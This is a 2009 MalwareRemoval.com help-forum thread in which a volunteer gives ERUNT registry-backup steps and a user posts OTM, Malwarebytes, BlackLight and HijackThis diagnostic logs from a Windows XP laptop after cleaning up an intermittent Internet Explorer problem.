Welcome to MalwareRemoval.com,
What if we told you that you could get malware removal help from experts, and that it was 100% free? MalwareRemoval.com provides free support for people with infected computers. Our help, and the tools we use are always 100% free. No hidden catch. We simply enjoy helping others. You enjoy a clean, safe computer.

HJT LOG (IE - Internet Explorer cannot display the webpage)


Re: HJT LOG (IE - Internet Explorer cannot display the webpage)

Unread postby Dakeyras » August 4th, 2009, 8:55 am

Hi :)

Thanks for your help.
You're welcome!

I do not have ERUNT on my system. Please let me know how to proceed.
Not a problem; actually, you took the correct course of action in informing me, and please accept my apology for the mistake concerning ERUNT.

OK follow these instructions for ERUNT and then proceed to my prior for running OTM onwards, thank you.

Backup the Registry:

Modifying the Registry can create unforeseen problems, so it is always wise to create a backup before doing so.

  • Please go here and download ERUNT.
  • ERUNT (Emergency Recovery Utility NT) is a free program that allows you to keep a complete backup of your registry and restore it when needed.
  • Install ERUNT by following the prompts.
  • Use the default install settings but say no to the portion that asks you to add ERUNT to the Start-Up folder. You can enable this option later if you wish.
  • Start ERUNT either by double clicking on the desktop icon or choosing to start the program at the end of the setup process.
  • Choose a location for the backup. Note: the default location is C:\WINDOWS\ERDNT which is acceptable.
  • Make sure that at least the first two check boxes are selected.
  • Click on OK
  • Then click on YES to create the folder.

Note: if it is necessary to restore the registry, open the backup folder and start ERDNT.exe
Dakeyras
MRU Honors Graduate
Posts: 8804
Joined: November 21st, 2007, 5:30 am
Location: The Tundra

Re: HJT LOG (IE - Internet Explorer cannot display the webpage)

Unread postby hn2009 » August 4th, 2009, 1:31 pm

Hey,

My browser seems to work fine as of now; however, since the problem is intermittent, I will keep an eye out for the same problem again and will let you know. Thanks again for your valuable time and effort.

Below are the details you requested.

OTM Log

All processes killed
========== PROCESSES ==========
No active process named Explorer.EXE was found!
========== REGISTRY ==========
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\\"Start Page"|"http://www.msn.com" /E : value set successfully!
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AF69DE43-7D58-4638-B6FA-CE66B5AD205D}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AF69DE43-7D58-4638-B6FA-CE66B5AD205D}\ deleted successfully.
Registry key HKEY_CLASSES_ROOT\CLSID\{AF69DE43-7D58-4638-B6FA-CE66B5AD205D}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AF69DE43-7D58-4638-B6FA-CE66B5AD205D}\ not found.
========== FILES ==========
C:\Velocity Media\Website v2\about.html moved successfully.
C:\Velocity Media\Website v2\bottom.html moved successfully.
C:\Velocity Media\Website v2\contact.html moved successfully.
C:\Velocity Media\Website v2\corpevents.html moved successfully.
C:\Velocity Media\Website v2\creative.html moved successfully.
C:\Velocity Media\Website v2\events.html moved successfully.
C:\Velocity Media\Website v2\gallery.html moved successfully.
C:\Velocity Media\Website v2\gallery2.html moved successfully.
C:\Velocity Media\Website v2\marcom.html moved successfully.
C:\Velocity Media\Website v2\marketing.html moved successfully.
C:\Velocity Media\Website v2\menu.html moved successfully.
C:\Velocity Media\Website v2\menu.js moved successfully.
C:\Velocity Media\Website v2\pbrowser_dom.js moved successfully.
C:\Velocity Media\Website v2\pbrowser_ie.js moved successfully.
C:\Velocity Media\Website v2\pbrowser_iemac.js moved successfully.
C:\Velocity Media\Website v2\pbrowser_opera.js moved successfully.
C:\Velocity Media\Website v2\pbrowser_safari.js moved successfully.
C:\Velocity Media\Website v2\portfolio.html moved successfully.
C:\Velocity Media\Website v2\pr.html moved successfully.
C:\Velocity Media\Website v2\services.html moved successfully.
C:\Velocity Media\Website v2\swfobject.js moved successfully.
C:\Velocity Media\Website v2\thankyou.html moved successfully.
C:\Velocity Media\Website v2\top.html moved successfully.
C:\Velocity Media\Website v2\validation1.js moved successfully.
C:\Velocity Media\Website v2\vmenu1.js moved successfully.
C:\Velocity Media\Website v2\_holding.htm moved successfully.
C:\Velocity Media\Website v3\archive\gallery.html moved successfully.
C:\Velocity Media\Website v3\archive\swfobject.js moved successfully.
C:\Velocity Media\Website v3\archive\validation1.js moved successfully.
C:\Velocity Media\Web Design\Vector Graphics\645 Vector Design Elements.exe moved successfully.
C:\WINDOWS\tasks\User_Feed_Synchronization-{AC22173D-1CEC-4997-A460-1D4979E3C285}.job moved successfully.
========== COMMANDS ==========

[EMPTYTEMP]

User: admin

User: Administrator
->Temp folder emptied: 0 bytes

User: All Users

User: Default User
->Temp folder emptied: 0 bytes

User: Guest
->Temporary Internet Files folder emptied: 0 bytes

User: LocalService
->Temp folder emptied: 0 bytes

User: me
->Temp folder emptied: 78372234 bytes
->Temporary Internet Files folder emptied: 43739140 bytes
->Java cache emptied: 13981126 bytes
->FireFox cache emptied: 45941749 bytes
->Google Chrome cache emptied: 276268362 bytes

User: NetworkService
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 16786 bytes

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 5182481 bytes
Windows Temp folder emptied: 1360929 bytes
RecycleBin emptied: 0 bytes

Total Files Cleaned = 443.33 mb


OTM by OldTimer - Version 3.0.0.5 log created on 08042009_191310

Files moved on Reboot...

Registry entries deleted on Reboot...



Malwarebytes Log

Malwarebytes' Anti-Malware 1.40
Database version: 2551
Windows 5.1.2600 Service Pack 3

8/4/2009 7:34:12 PM
mbam-log-2009-08-04 (19-34-12).txt

Scan type: Quick Scan
Objects scanned: 109076
Time elapsed: 8 minute(s), 6 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)



BlackLight Log

08/04/09 19:37:04 [Info]: BlackLight Engine 2.2.1092 initialized
08/04/09 19:37:04 [Info]: OS: 5.1 build 2600 (Service Pack 3)
08/04/09 19:37:04 [Note]: 7019 4
08/04/09 19:37:04 [Note]: 7005 0
08/04/09 19:37:07 [Note]: 7006 0
08/04/09 19:37:07 [Note]: 7022 0
08/04/09 19:37:07 [Note]: 7011 2112
08/04/09 19:37:07 [Note]: 7035 0
08/04/09 19:37:07 [Note]: 7026 0
08/04/09 19:37:07 [Note]: 7026 0
08/04/09 19:37:07 [Note]: FSRAW library version 1.7.1024
08/04/09 22:49:26 [Note]: 7007 0



RSIT Log

Logfile of random's system information tool 1.06 (written by random/random)
Run by me at 2009-08-04 22:49:48
Microsoft Windows XP Home Edition Service Pack 3
System drive C: has 12 GB (18%) free of 66 GB
Total RAM: 1526 MB (41% free)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 10:50:35 PM, on 8/4/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe
C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Symantec\Symantec Endpoint Protection\Rtvscan.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Symantec\Symantec Endpoint Protection\SmcGui.exe
C:\Program Files\hpq\HP Wireless Assistant\HP Wireless Assistant.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe
C:\Program Files\Google\Google Talk\googletalk.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
C:\PROGRA~1\WIDCOMM\BLUETO~1\BTSTAC~1.EXE
C:\Program Files\Common Files\Teleca Shared\Generic.exe
C:\PROGRA~1\Symbian\Shared\SYMBIA~1\SYMBIA~1.EXE
C:\PROGRA~1\Symbian\Shared\SYMBIA~1\SCBAL.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Windows Live\Contacts\wlcomm.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Java\jre6\bin\java.exe
C:\WINDOWS\notepad.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\WINDOWS\system32\wuauclt.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Documents and Settings\me\Desktop\RSIT.exe
C:\Program Files\Trend Micro\HijackThis\me.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://ie.redirect.hp.com/svs/rdr?TYPE= ... &pf=laptop
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MICROS~4\Office12\GRA8E1~1.DLL
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files\Google\Google Toolbar\GoogleToolbar.dll
O2 - BHO: AcroIEToolbarHelper Class - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll
O2 - BHO: Google Dictionary Compression sdch - {C84D72FE-E17D-4195-BB24-76C02E2E7C4E} - C:\Program Files\Google\Google Toolbar\Component\fastsearch_A8904FB862BD9564.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll
O3 - Toolbar: Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar.dll
O4 - HKLM\..\Run: [hpWirelessAssistant] C:\Program Files\hpq\HP Wireless Assistant\HP Wireless Assistant.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [QlbCtrl] %ProgramFiles%\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start
O4 - HKLM\..\Run: [googletalk] C:\Program Files\Google\Google Talk\googletalk.exe /autostart
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [PC Suite for Smartphones] "C:\Program Files\Sony Ericsson\Mobile4\Application Launcher\Application Launcher.exe" /startoptions
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\RunOnce: [Malwarebytes' Anti-Malware] C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe /install /silent
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [mRouterConfig] "C:\Program Files\Intuwave\Shared\mRouterRuntime\mRouterConfig.exe"
O4 - Global Startup: Bluetooth.lnk = ?
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~4\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~4\Office12\ONBttnIE.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~4\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {4871A87A-BFDD-4106-8153-FFDE2BAC2967} (DLM Control) - http://dlm.tools.akamai.com/dlmanager/v ... .2.4.8.cab
O16 - DPF: {49232000-16E4-426C-A231-62846947304B} (SysData Class) - https://wimpro.cce.hp.com/ChatEntry/dow ... ysinfo.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/windows ... 4784755890
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/Me ... b56907.cab
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
O16 - DPF: {F9043C85-F6F2-101A-A3C9-08002B2F49FB} (Microsoft Common Dialog Control, version 6.0 (SP6)) - file:///C:/Program%20Files/OpenCube/NavStudio/program/comdlg32.cab
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~1\MICROS~4\Office12\GR99D3~1.DLL
O18 - Filter: x-sdch - {B1759355-3EEC-4C1E-B0F1-B719FE26E377} - C:\Program Files\Google\Google Toolbar\Component\fastsearch_A8904FB862BD9564.dll
O20 - Winlogon Notify: !SASWinLogon - C:\Program Files\SUPERAntiSpyware\SASWINLO.dll
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: LiveUpdate - Symantec Corporation - C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE
O23 - Service: Symantec Management Client (SmcService) - Symantec Corporation - C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe
O23 - Service: Symantec Endpoint Protection (Symantec AntiVirus) - Symantec Corporation - C:\Program Files\Symantec\Symantec Endpoint Protection\Rtvscan.exe

--
End of file - 10191 bytes

======Scheduled tasks folder======

C:\WINDOWS\tasks\AppleSoftwareUpdate.job
C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-721153600-2154975418-3561496284-1006Core.job
C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-721153600-2154975418-3561496284-1006UA.job

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}]
Adobe PDF Reader Link Helper - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll [2009-02-27 61816]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
Adobe PDF Link Helper - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27 75128]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3049C3E9-B461-4BC5-8870-4C09146192CA}]
RealPlayer Download and Record Plugin for Internet Explorer - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll [2008-12-25 304736]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}]
Groove GFS Browser Helper - C:\PROGRA~1\MICROS~4\Office12\GRA8E1~1.DLL [2006-10-27 2210608]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}]
Windows Live Sign-in Helper - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-01-22 408448]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AA58ED58-01DD-4d91-8333-CF10577473F7}]
Google Toolbar Helper - C:\Program Files\Google\Google Toolbar\GoogleToolbar.dll [2009-06-05 259696]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE7CD045-E861-484f-8273-0445EE161910}]
AcroIEToolbarHelper Class - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll [2003-05-15 147456]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{C84D72FE-E17D-4195-BB24-76C02E2E7C4E}]
Google Dictionary Compression sdch - C:\Program Files\Google\Google Toolbar\Component\fastsearch_A8904FB862BD9564.dll [2009-06-05 470512]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre6\bin\jp2ssv.dll [2009-08-04 41368]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
JQSIEStartDetectorImpl Class - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll [2009-08-04 73728]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
{47833539-D0C5-4125-9FA8-0819E2EAAC93} - Adobe PDF - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll [2003-05-15 147456]
Locked
{2318C2B1-4965-11d4-9B18-009027A5CD4F} - Google Toolbar - C:\Program Files\Google\Google Toolbar\GoogleToolbar.dll [2009-06-05 259696]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"hpWirelessAssistant"=C:\Program Files\hpq\HP Wireless Assistant\HP Wireless Assistant.exe [2006-05-04 458752]
"SynTPEnh"=C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2006-06-17 794713]
"HP Software Update"=C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe [2005-02-16 49152]
"QlbCtrl"=C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe [2006-06-19 163840]
"googletalk"=C:\Program Files\Google\Google Talk\googletalk.exe [2007-01-02 3739648]
"ccApp"=C:\Program Files\Common Files\Symantec Shared\ccApp.exe [2009-03-17 115560]
"QuickTime Task"=C:\Program Files\QuickTime\qttask.exe [2009-05-26 413696]
"TkBellExe"=C:\Program Files\Common Files\Real\Update_OB\realsched.exe [2008-12-25 185872]
"PC Suite for Smartphones"=C:\Program Files\Sony Ericsson\Mobile4\Application Launcher\Application Launcher.exe [2007-05-28 528384]
"Adobe Reader Speed Launcher"=C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe [2009-02-27 35696]
"SunJavaUpdateSched"=C:\Program Files\Java\jre6\bin\jusched.exe [2009-08-04 148888]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Malwarebytes' Anti-Malware"=C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe [2009-08-03 419088]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"msnmsgr"=C:\Program Files\Windows Live\Messenger\msnmsgr.exe [2009-02-06 3885408]
"swg"=C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [2008-11-20 68856]
"ctfmon.exe"=C:\WINDOWS\system32\ctfmon.exe [2008-04-14 15360]
"mRouterConfig"=C:\Program Files\Intuwave\Shared\mRouterRuntime\mRouterConfig.exe [2006-03-02 290816]

C:\Documents and Settings\All Users\Start Menu\Programs\Startup
Bluetooth.lnk - C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\!SASWinLogon]
C:\Program Files\SUPERAntiSpyware\SASWINLO.dll [2008-12-22 356352]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\igfxcui]
C:\WINDOWS\system32\igfxdev.dll [2006-03-23 139264]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll [2006-10-18 133632]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{B5A7F190-DDA6-4420-B3BA-52453494E6CD}"=C:\PROGRA~1\MICROS~4\Office12\GRA8E1~1.DLL [2006-10-27 2210608]
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"=C:\Program Files\SUPERAntiSpyware\SASSEH.DLL [2008-05-13 77824]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ccEvtMgr]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ccSetMgr]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Symantec Antivirus]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\ccEvtMgr]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\ccSetMgr]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\SmcService]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\Symantec Antivirus]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveTypeAutoRun"=149
"NoDriveAutoRun"=0
"NoDrives"=0

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"HonorAutoRunSetting"=
"NoDriveAutoRun"=
"NoDriveTypeAutoRun"=
"NoDrives"=

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"C:\Program Files\Google\Google Talk\googletalk.exe"="C:\Program Files\Google\Google Talk\googletalk.exe:*:Enabled:Google Talk"
"C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe"="C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe:*:Enabled:SMC Service"
"C:\Program Files\Symantec\Symantec Endpoint Protection\SNAC.EXE"="C:\Program Files\Symantec\Symantec Endpoint Protection\SNAC.EXE:*:Enabled:SNAC Service"
"C:\Program Files\Common Files\Symantec Shared\ccApp.exe"="C:\Program Files\Common Files\Symantec Shared\ccApp.exe:*:Enabled:Symantec Email"
"C:\Program Files\Windows Live\Messenger\wlcsdk.exe"="C:\Program Files\Windows Live\Messenger\wlcsdk.exe:*:Enabled:Windows Live Call"
"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"
"C:\Program Files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe"="C:\Program Files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe:*:Enabled:Adobe CSI CS4"
"C:\Program Files\Bonjour\mDNSResponder.exe"="C:\Program Files\Bonjour\mDNSResponder.exe:*:Enabled:Bonjour"
"C:\Program Files\iTunes\iTunes.exe"="C:\Program Files\iTunes\iTunes.exe:*:Enabled:iTunes"
"C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE"="C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE:*:Enabled:Microsoft Office Outlook"
"C:\Program Files\Microsoft Office\Office12\GROOVE.EXE"="C:\Program Files\Microsoft Office\Office12\GROOVE.EXE:*:Enabled:Microsoft Office Groove"
"C:\Program Files\Microsoft Office\Office12\ONENOTE.EXE"="C:\Program Files\Microsoft Office\Office12\ONENOTE.EXE:*:Enabled:Microsoft Office OneNote"

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"C:\Program Files\Windows Live\Messenger\wlcsdk.exe"="C:\Program Files\Windows Live\Messenger\wlcsdk.exe:*:Enabled:Windows Live Call"
"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
